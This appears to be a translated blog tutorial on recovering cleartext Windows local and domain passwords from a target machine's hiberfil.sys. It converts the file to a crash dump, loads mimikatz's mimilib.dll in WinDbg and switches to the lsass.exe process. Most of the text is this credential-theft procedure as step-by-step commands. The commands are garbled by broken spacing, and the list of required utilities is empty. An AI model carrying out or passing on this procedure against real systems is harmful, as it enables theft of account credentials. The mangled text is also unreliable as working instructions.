Recovering local and domain passwords from hiberfil.sys

The mimikatz utility , which allows you to extract Windows credentials from LSA in open form, has existed since 2012, but in addition to the well-lit functionality for recovering passwords from the memory of a running OS, it has another rather interesting feature. Next, I will provide step-by-step instructions on how to extract credentials from the hiberfil.sys file using simple steps.

Training


To implement our plan, we will need the following utilities:

Actions


1. Get the hiberfil.sys file from the target machine.

2. Convert the file to a format that WinDbg understands.

hibr2dmp.exe d: \ temp \ hiberfil.sys c: \ temp \ hiberfil.dmp

The process can take quite a while

image

3. Run WinDbg and open the resulting file.

File -> Open Crash Dump

4. Configure debugging symbols.

Open File -> Symbol File Path ... and enter the following line:

SRV * c: \ symbols * http: //msdl.microsoft.com/download/symbols

image

Instead of c: \ symbols, of course, there can be any directory in which to load characters

At the command line of the debugger we write:

0: kd> .reload / n

We are waiting for the end of the loading of characters:

image

5. Specify the path to the mimilib.dll library (located in the directory with mimikatz).

0: kd> .load z: \ Soft \ Security \ Passwords \ Mimikatz \ x64 \ mimilib.dll

image

6. Find the address of the lsass.exe process.

0: kd> ! Process 0 0 lsass.exe

image

In this case, the address is: fffffa800a7d9060.

7. Switch the context of the process.

0: kd> .process / r / p fffffa800a7d9060

image

8. Run mimikatz and get the passwords in clear text.

0: kd> ! Mimikatz

image

Related Links


Credential Disclosure in Microsoft Windows: http://www.securitylab.ru/vulnerability/420418.php
LSA Authentication: https://msdn.microsoft.com/en-us/library/windows/desktop/aa378326(v=vs .85) .aspx
What is Digest Authentication: https://technet.microsoft.com/en-us/library/cc778868(WS.10).aspx

Also popular now: